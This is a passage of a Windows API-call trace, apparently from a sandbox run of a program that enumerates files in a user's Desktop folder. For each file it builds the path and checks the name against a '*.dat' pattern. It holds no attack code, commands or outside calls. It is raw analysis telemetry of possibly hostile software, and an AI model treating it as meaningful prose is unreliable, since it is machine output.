returned="\\KTOu\\_5VgSE0-6jvrM" [0110.732] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.732] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="." | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\.") returned="\\KTOu\\_5VgSE0-6jvrM\\." [0110.732] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.732] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.732] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.732] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.732] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\.." [0110.732] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.732] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.732] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2=".." | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\..") returned="\\KTOu\\_5VgSE0-6jvrM\\.." [0110.732] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.732] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.732] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67bd380, ftCreationTime.dwHighDateTime=0x1d7ab0a, ftLastAccessTime.dwLowDateTime=0x1a731140, ftLastAccessTime.dwHighDateTime=0x1d7ad95, ftLastWriteTime.dwLowDateTime=0x1a731140, ftLastWriteTime.dwHighDateTime=0x1d7ad95, nFileSizeHigh=0x0, nFileSizeLow=0xa5ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="aQrMbJ6CFhwhf7PNnuMu.docx", cAlternateFileName="AQRMBJ~1.DOC")) returned 1 [0110.732] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.732] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.732] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="aQrMbJ6CFhwhf7PNnuMu.docx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx" [0110.732] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.732] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.732] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="aQrMbJ6CFhwhf7PNnuMu.docx" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx") returned="\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx" [0110.732] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a04a0 [0110.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx", cchWideChar=76, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0110.732] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4c) returned 0x38eaf20 [0110.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx", cchWideChar=76, lpMultiByteStr=0x38eaf20, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\aQrMbJ6CFhwhf7PNnuMu.docx", lpUsedDefaultChar=0x0) returned 76 [0110.733] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eaf78 [0110.733] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eaf20 | out: hHeap=0x29a0000) returned 1 [0110.733] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.733] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aabe8 [0110.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x29aabe8, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.734] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aabe8 | out: hHeap=0x29a0000) returned 1 [0110.734] PathMatchSpecW (pszFile="aQrMbJ6CFhwhf7PNnuMu.docx", pszSpec="*.dat") returned 0 [0110.734] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eaf78 | out: hHeap=0x29a0000) returned 1 [0110.734] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2615710, ftCreationTime.dwHighDateTime=0x1d7aff0, ftLastAccessTime.dwLowDateTime=0xec0a4a10, ftLastAccessTime.dwHighDateTime=0x1d7aff3, ftLastWriteTime.dwLowDateTime=0xec0a4a10, ftLastWriteTime.dwHighDateTime=0x1d7aff3, nFileSizeHigh=0x0, nFileSizeLow=0x155c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="ge40CUtwTNBApkxPnR.png", cAlternateFileName="GE40CU~1.PNG")) returned 1 [0110.734] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.734] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.734] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="ge40CUtwTNBApkxPnR.png" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png" [0110.734] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.734] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.734] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="ge40CUtwTNBApkxPnR.png" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png") returned="\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png" [0110.734] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a04a0 [0110.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0110.734] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x49) returned 0x38ea9a0 [0110.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png", cchWideChar=73, lpMultiByteStr=0x38ea9a0, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\ge40CUtwTNBApkxPnR.png", lpUsedDefaultChar=0x0) returned 73 [0110.734] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eab00 [0110.734] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea9a0 | out: hHeap=0x29a0000) returned 1 [0110.734] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.734] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aabe8 [0110.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x29aabe8, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.734] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aabe8 | out: hHeap=0x29a0000) returned 1 [0110.734] PathMatchSpecW (pszFile="ge40CUtwTNBApkxPnR.png", pszSpec="*.dat") returned 0 [0110.734] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eab00 | out: hHeap=0x29a0000) returned 1 [0110.734] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68b17880, ftCreationTime.dwHighDateTime=0x1d7ad02, ftLastAccessTime.dwLowDateTime=0xd0a9b460, ftLastAccessTime.dwHighDateTime=0x1d7ae48, ftLastWriteTime.dwLowDateTime=0xd0a9b460, ftLastWriteTime.dwHighDateTime=0x1d7ae48, nFileSizeHigh=0x0, nFileSizeLow=0x8a52, dwReserved0=0x0, dwReserved1=0x0, cFileName="QXzQAUh0jIi.bmp", cAlternateFileName="QXZQAU~1.BMP")) returned 1 [0110.734] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.734] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.734] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="QXzQAUh0jIi.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp" [0110.734] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.735] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.735] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="QXzQAUh0jIi.bmp" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp") returned="\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp" [0110.735] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x29a04a0 [0110.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp", cchWideChar=66, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 66 [0110.735] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x42) returned 0x39700d0 [0110.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp", cchWideChar=66, lpMultiByteStr=0x39700d0, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\QXzQAUh0jIi.bmp", lpUsedDefaultChar=0x0) returned 66 [0110.735] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eae70 [0110.735] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.735] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.735] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aac78 [0110.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x29aac78, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.735] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac78 | out: hHeap=0x29a0000) returned 1 [0110.735] PathMatchSpecW (pszFile="QXzQAUh0jIi.bmp", pszSpec="*.dat") returned 0 [0110.735] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eae70 | out: hHeap=0x29a0000) returned 1 [0110.735] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb0dfa80, ftCreationTime.dwHighDateTime=0x1d7aeba, ftLastAccessTime.dwLowDateTime=0x36bafe00, ftLastAccessTime.dwHighDateTime=0x1d7b022, ftLastWriteTime.dwLowDateTime=0x36bafe00, ftLastWriteTime.dwHighDateTime=0x1d7b022, nFileSizeHigh=0x0, nFileSizeLow=0x5c34, dwReserved0=0x0, dwReserved1=0x0, cFileName="YzBjdPQG.jpg", cAlternateFileName="")) returned 1 [0110.735] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.735] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\" [0110.735] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\", lpString2="YzBjdPQG.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg" [0110.735] lstrcpyW (in: lpString1=0x19bd38, lpString2="\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM") returned="\\KTOu\\_5VgSE0-6jvrM" [0110.736] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM", lpString2="\\" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\") returned="\\KTOu\\_5VgSE0-6jvrM\\" [0110.736] lstrcatW (in: lpString1="\\KTOu\\_5VgSE0-6jvrM\\", lpString2="YzBjdPQG.jpg" | out: lpString1="\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg") returned="\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg" [0110.736] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04a0 [0110.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0110.736] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3f) returned 0x29a2c00 [0110.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg", cchWideChar=63, lpMultiByteStr=0x29a2c00, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\YzBjdPQG.jpg", lpUsedDefaultChar=0x0) returned 63 [0110.736] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2810 [0110.736] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c00 | out: hHeap=0x29a0000) returned 1 [0110.736] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.736] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aac78 [0110.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=6, lpWideCharStr=0x29aac78, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.736] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac78 | out: hHeap=0x29a0000) returned 1 [0110.737] PathMatchSpecW (pszFile="YzBjdPQG.jpg", pszSpec="*.dat") returned 0 [0110.737] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2810 | out: hHeap=0x29a0000) returned 1 [0110.737] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb0dfa80, ftCreationTime.dwHighDateTime=0x1d7aeba, ftLastAccessTime.dwLowDateTime=0x36bafe00, ftLastAccessTime.dwHighDateTime=0x1d7b022, ftLastWriteTime.dwLowDateTime=0x36bafe00, ftLastWriteTime.dwHighDateTime=0x1d7b022, nFileSizeHigh=0x0, nFileSizeLow=0x5c34, dwReserved0=0x0, dwReserved1=0x0, cFileName="YzBjdPQG.jpg", cAlternateFileName="")) returned 0 [0110.737] FindClose (in: hFindFile=0x7435a0 | out: hFindFile=0x7435a0) returned 1 [0110.737] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04a0 [0110.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0110.737] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x32) returned 0x38ea798 [0110.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", cchWideChar=50, lpMultiByteStr=0x38ea798, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM", lpUsedDefaultChar=0x0) returned 50 [0110.737] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2810 [0110.737] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea798 | out: hHeap=0x29a0000) returned 1 [0110.737] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04a0 | out: hHeap=0x29a0000) returned 1 [0110.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.737] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaae0 [0110.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x29aaae0, cchWideChar=6 | out: lpWideCharStr="*.dat") returned 6 [0110.737] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaae0 | out: hHeap=0x29a0000) returned 1 [0110.737] PathMatchSpecW (pszFile="_5VgSE0-6jvrM", pszSpec="*.dat") returned 0 [0110.737] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2810 | out: hHeap=0x29a0000) returned 1 [0110.737] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_5VgSE0-6jvrM", cAlternateFileName="_5VGSE~1")) returned 0 [0110.737] FindClose (in: hFindFile=0x743320 | out: hFindFile=0x743320) returned 1 [0110.737] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eb028 [0110.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0110.738] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x24) returned 0x29a30d8 [0110.738] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", cchWideChar=36, lpMultiByteStr=0x29a30d8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpUsedDefaultChar=0x0) returned 36 [0110.738] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.738] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a30d8 | out: hHeap=0x29a0000) returned 1 [0110.738] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eb028 | out: hHeap=0x29a0000) returned 1 [0110.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.738] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaaf8 [0110.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aaaf8, cchWideChar=6 | out: 